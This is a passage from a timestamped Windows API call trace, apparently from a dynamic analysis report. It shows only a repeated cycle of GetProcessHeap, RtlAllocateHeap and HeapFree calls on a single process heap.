lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.786] GetProcessHeap () returned 0xe30000 [0120.786] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.786] GetProcessHeap () returned 0xe30000 [0120.787] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.787] GetProcessHeap () returned 0xe30000 [0120.787] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0120.787] GetProcessHeap () returned 0xe30000 [0120.787] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0120.787] GetProcessHeap () returned 0xe30000 [0120.787] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0120.787] GetProcessHeap () returned 0xe30000 [0120.787] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0120.787] GetProcessHeap () returned 0xe30000 [0120.787] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0120.787] GetProcessHeap () returned 0xe30000 [0120.787] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0120.787] GetProcessHeap () returned 0xe30000 [0120.787] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0120.787] GetProcessHeap () returned 0xe30000 [0120.787] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0120.787] GetProcessHeap () returned 0xe30000 [0120.787] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0120.787] GetProcessHeap () returned 0xe30000 [0120.787] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0120.787] GetProcessHeap () returned 0xe30000 [0120.787] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0120.787] GetProcessHeap () returned 0xe30000 [0120.787] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0120.787] GetProcessHeap () returned 0xe30000 [0120.787] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0120.787] GetProcessHeap () returned 0xe30000 [0120.787] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0120.787] GetProcessHeap () returned 0xe30000 [0120.787] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0120.787] GetProcessHeap () returned 0xe30000 [0120.787] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0120.787] GetProcessHeap () returned 0xe30000 [0120.787] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0120.787] GetProcessHeap () returned 0xe30000 [0120.788] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0120.788] GetProcessHeap () returned 0xe30000 [0120.788] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.788] GetProcessHeap () returned 0xe30000 [0120.788] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.788] GetProcessHeap () returned 0xe30000 [0120.788] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0120.788] GetProcessHeap () returned 0xe30000 [0120.788] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0120.788] GetProcessHeap () returned 0xe30000 [0120.788] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0120.788] GetProcessHeap () returned 0xe30000 [0120.788] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0120.788] GetProcessHeap () returned 0xe30000 [0120.788] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.788] GetProcessHeap () returned 0xe30000 [0120.788] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.788] GetProcessHeap () returned 0xe30000 [0120.788] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.788] GetProcessHeap () returned 0xe30000 [0120.788] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.788] GetProcessHeap () returned 0xe30000 [0120.788] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0120.788] GetProcessHeap () returned 0xe30000 [0120.788] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0120.788] GetProcessHeap () returned 0xe30000 [0120.788] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.788] GetProcessHeap () returned 0xe30000 [0120.788] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.788] GetProcessHeap () returned 0xe30000 [0120.788] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0120.788] GetProcessHeap () returned 0xe30000 [0120.788] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0120.788] GetProcessHeap () returned 0xe30000 [0120.788] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.788] GetProcessHeap () returned 0xe30000 [0120.789] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.789] GetProcessHeap () returned 0xe30000 [0120.789] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.789] GetProcessHeap () returned 0xe30000 [0120.789] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.789] GetProcessHeap () returned 0xe30000 [0120.789] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0120.789] GetProcessHeap () returned 0xe30000 [0120.789] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0120.789] GetProcessHeap () returned 0xe30000 [0120.789] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0120.789] GetProcessHeap () returned 0xe30000 [0120.789] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0120.789] GetProcessHeap () returned 0xe30000 [0120.789] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0120.789] GetProcessHeap () returned 0xe30000 [0120.789] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0120.789] GetProcessHeap () returned 0xe30000 [0120.789] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.789] GetProcessHeap () returned 0xe30000 [0120.789] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.789] GetProcessHeap () returned 0xe30000 [0120.789] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.789] GetProcessHeap () returned 0xe30000 [0120.789] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.789] GetProcessHeap () returned 0xe30000 [0120.789] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0120.789] GetProcessHeap () returned 0xe30000 [0120.789] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0120.789] GetProcessHeap () returned 0xe30000 [0120.789] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0120.789] GetProcessHeap () returned 0xe30000 [0120.789] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0120.789] GetProcessHeap () returned 0xe30000 [0120.789] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.789] GetProcessHeap () returned 0xe30000 [0120.790] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.790] GetProcessHeap () returned 0xe30000 [0120.790] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0120.790] GetProcessHeap () returned 0xe30000 [0120.790] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0120.790] GetProcessHeap () returned 0xe30000 [0120.790] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.790] GetProcessHeap () returned 0xe30000 [0120.790] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.790] GetProcessHeap () returned 0xe30000 [0120.790] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0120.790] GetProcessHeap () returned 0xe30000 [0120.790] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0120.790] GetProcessHeap () returned 0xe30000 [0120.790] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.790] GetProcessHeap () returned 0xe30000 [0120.790] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.790] GetProcessHeap () returned 0xe30000 [0120.790] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.790] GetProcessHeap () returned 0xe30000 [0120.790] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.790] GetProcessHeap () returned 0xe30000 [0120.790] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0120.790] GetProcessHeap () returned 0xe30000 [0120.790] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0120.790] GetProcessHeap () returned 0xe30000 [0120.790] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.790] GetProcessHeap () returned 0xe30000 [0120.790] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.790] GetProcessHeap () returned 0xe30000 [0120.790] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0120.790] GetProcessHeap () returned 0xe30000 [0120.790] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0120.790] GetProcessHeap () returned 0xe30000 [0120.790] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.790] GetProcessHeap () returned 0xe30000 [0120.791] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.791] GetProcessHeap () returned 0xe30000 [0120.791] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0120.791] GetProcessHeap () returned 0xe30000 [0120.791] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0120.791] GetProcessHeap () returned 0xe30000 [0120.791] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0120.791] GetProcessHeap () returned 0xe30000 [0120.791] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0120.791] GetProcessHeap () returned 0xe30000 [0120.791] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.791] GetProcessHeap () returned 0xe30000 [0120.791] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.791] GetProcessHeap () returned 0xe30000 [0120.791] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0120.791] GetProcessHeap () returned 0xe30000 [0120.791] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0120.791] GetProcessHeap () returned 0xe30000 [0120.791] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0120.791] GetProcessHeap () returned 0xe30000 [0120.791] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0120.791] GetProcessHeap () returned 0xe30000 [0120.791] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.791] GetProcessHeap () returned 0xe30000 [0120.791] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.791] GetProcessHeap () returned 0xe30000 [0120.791] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.791] GetProcessHeap () returned 0xe30000 [0120.791] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.791] GetProcessHeap () returned 0xe30000 [0120.791] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0120.791] GetProcessHeap () returned 0xe30000 [0120.791] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0120.791] GetProcessHeap () returned 0xe30000 [0120.791] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0120.791] GetProcessHeap () returned 0xe30000 [0120.792] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0120.792] GetProcessHeap () returned 0xe30000 [0120.792] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0120.792] GetProcessHeap () returned 0xe30000 [0120.792] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0120.792] GetProcessHeap () returned 0xe30000 [0120.792] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.792] GetProcessHeap () returned 0xe30000 [0120.792] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.792] GetProcessHeap () returned 0xe30000 [0120.792] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0120.792] GetProcessHeap () returned 0xe30000 [0120.792] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0120.792] GetProcessHeap () returned 0xe30000 [0120.792] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0120.792] GetProcessHeap () returned 0xe30000 [0120.792] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0120.792] GetProcessHeap () returned 0xe30000 [0120.792] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0120.792] GetProcessHeap () returned 0xe30000 [0120.792] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0120.792] GetProcessHeap () returned 0xe30000 [0120.792] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0120.792] GetProcessHeap () returned 0xe30000 [0120.792] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0120.792] GetProcessHeap () returned 0xe30000 [0120.792] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.792] GetProcessHeap () returned 0xe30000 [0120.792] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.792] GetProcessHeap () returned 0xe30000 [0120.792] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0120.792] GetProcessHeap () returned 0xe30000 [0120.792] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0120.792] GetProcessHeap () returned 0xe30000 [0120.792] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0120.792] GetProcessHeap () returned 0xe30000 [0120.793] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0120.793] GetProcessHeap () returned 0xe30000 [0120.793] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.793] GetProcessHeap () returned 0xe30000 [0120.793] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.793] GetProcessHeap () returned 0xe30000 [0120.793] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.793] GetProcessHeap () returned 0xe30000 [0120.793] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.793] GetProcessHeap () returned 0xe30000 [0120.793] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0120.793] GetProcessHeap () returned 0xe30000 [0120.793] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0120.793] GetProcessHeap () returned 0xe30000 [0120.793] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.793] GetProcessHeap () returned 0xe30000 [0120.793] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.793] GetProcessHeap () returned 0xe30000 [0120.793] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0120.793] GetProcessHeap () returned 0xe30000 [0120.793] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0120.793] GetProcessHeap () returned 0xe30000 [0120.793] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.793] GetProcessHeap () returned 0xe30000 [0120.793] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.793] GetProcessHeap () returned 0xe30000 [0120.793] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.793] GetProcessHeap () returned 0xe30000 [0120.793] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.793] GetProcessHeap () returned 0xe30000 [0120.793] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.793] GetProcessHeap () returned 0xe30000 [0120.793] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.793] GetProcessHeap () returned 0xe30000 [0120.793] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.793] GetProcessHeap () returned 0xe30000 [0120.794] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.794] GetProcessHeap () returned 0xe30000 [0120.794] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.794] GetProcessHeap () returned 0xe30000 [0120.794] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.794] GetProcessHeap () returned 0xe30000 [0120.794] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0120.794] GetProcessHeap () returned 0xe30000 [0120.794] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0120.794] GetProcessHeap () returned 0xe30000 [0120.794] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0120.794] GetProcessHeap () returned 0xe30000 [0120.794] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0120.794] GetProcessHeap () returned 0xe30000 [0120.794] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.794] GetProcessHeap () returned 0xe30000 [0120.794] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.794] GetProcessHeap () returned 0xe30000 [0120.794] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0120.794] GetProcessHeap () returned 0xe30000 [0120.794] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0120.794] GetProcessHeap () returned 0xe30000 [0120.794] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0120.794] GetProcessHeap () returned 0xe30000 [0120.794] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0120.794] GetProcessHeap () returned 0xe30000 [0120.794] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0120.794] GetProcessHeap () returned 0xe30000 [0120.794] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0120.794] GetProcessHeap () returned 0xe30000 [0120.794] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.794] GetProcessHeap () returned 0xe30000 [0120.794] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.794] GetProcessHeap () returned 0xe30000 [0120.794] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.795] GetProcessHeap () returned 0xe30000 [0120.795] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.795] GetProcessHeap () returned 0xe30000 [0120.795] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0120.795] GetProcessHeap () returned 0xe30000 [0120.796] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0120.796] GetProcessHeap () returned 0xe30000 [0120.796] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.796] GetProcessHeap () returned 0xe30000 [0120.796] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.796] GetProcessHeap () returned 0xe30000 [0120.796] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0120.796] GetProcessHeap () returned 0xe30000 [0120.796] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0120.796] GetProcessHeap () returned 0xe30000 [0120.796] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0120.796] GetProcessHeap () returned 0xe30000 [0120.796] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0120.796] GetProcessHeap () returned 0xe30000 [0120.796] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.796] GetProcessHeap () returned 0xe30000 [0120.796] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.796] GetProcessHeap () returned 0xe30000 [0120.797] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0120.797] GetProcessHeap () returned 0xe30000 [0120.797] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0120.797] GetProcessHeap () returned 0xe30000 [0120.797] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0120.797] GetProcessHeap () returned 0xe30000 [0120.797] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0120.797] GetProcessHeap () returned 0xe30000 [0120.797] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.797] GetProcessHeap () returned 0xe30000 [0120.797] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.797] GetProcessHeap () returned 0xe30000 [0120.797] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0120.797] GetProcessHeap () returned 0xe30000 [0120.797] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0120.797] GetProcessHeap () returned 0xe30000 [0120.797] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0120.797] GetProcessHeap () returned 0xe30000 [0120.797] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0120.797] GetProcessHeap () returned 0xe30000 [0120.797] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0120.797] GetProcessHeap () returned 0xe30000 [0120.797] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0120.797] GetProcessHeap () returned 0xe30000 [0120.797] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.797] GetProcessHeap () returned 0xe30000 [0120.797] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.797] GetProcessHeap () returned 0xe30000 [0120.797] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.797] GetProcessHeap () returned 0xe30000 [0120.797] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.797] GetProcessHeap () returned 0xe30000 [0120.797] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.797] GetProcessHeap () returned 0xe30000 [0120.797] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.797] GetProcessHeap () returned 0xe30000 [0120.798] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.798] GetProcessHeap () returned 0xe30000 [0120.798] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.798] GetProcessHeap () returned 0xe30000 [0120.798] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0120.798] GetProcessHeap () returned 0xe30000 [0120.798] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0120.798] 